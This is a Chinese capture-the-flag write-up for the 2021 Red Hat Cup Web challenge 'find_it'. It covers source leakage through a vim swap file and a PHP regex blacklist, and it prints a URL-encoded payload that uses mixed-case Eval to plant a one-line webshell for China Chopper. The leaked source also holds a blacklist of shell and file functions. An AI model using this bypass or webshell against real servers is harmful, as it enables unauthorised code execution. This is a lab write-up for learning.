2021-第四届红帽杯网络安全大赛-Web-find_it

2021-第四届红帽杯网络安全大赛-Web-find_it

题目
2021-第四届红帽杯网络安全大赛-Web-find_it_第1张图片
先用目录扫描工具爆破一下目录,发现了robots.txt
2021-第四届红帽杯网络安全大赛-Web-find_it_第2张图片
访问后有了提示 1ndexx.php
2021-第四届红帽杯网络安全大赛-Web-find_it_第3张图片
直接访问不到,需要访问vim的保存的缓冲类型文件.swp,访问之后获取到源码。
2021-第四届红帽杯网络安全大赛-Web-find_it_第4张图片

http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/.1ndexx.php.swp

2021-第四届红帽杯网络安全大赛-Web-find_it_第5张图片
把关键代码粘贴出来看一下运行流程

  • 打开flag.php读取文件内容

  • 打开hack.php文件,获取code参数

  • 正则匹配危险函数

  • 字符串长度不能超过33

  • 将code参数的内容写入hack.php

  • 将flag.php内容写入hack.php

<?php
#Really easy...
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));
$hack=fopen("hack.php","w") or die("Unable 2 open");
$a=$_GET['code'];
if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
 die("you die");
}
if(strlen($a)>33){
 die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);
fclose($file);
fclose($hack);
?>

利用方式1:大小写过滤,利用Eval绕过eval限制,成功获取webshell

http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/index.php?code=%3C?php%20@Eval($_POST[%27aaa%27]);?%3E
使用菜刀工具连接hack.php
2021-第四届红帽杯网络安全大赛-Web-find_it_第6张图片
利用方式2:利用show_source高亮代码,再看代码的时候注意到flag.php里的内容会被写入到hack.php中,这样只需要高亮自己就可以看到flag了。
http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/index.php?code=%3C?php%20show_source(FILE);?%3E
不过这种方式我没有成功

参考:
https://www.jianshu.com/p/e17bf9e64e18

你可能感兴趣的:(CTFHUB,php,web安全)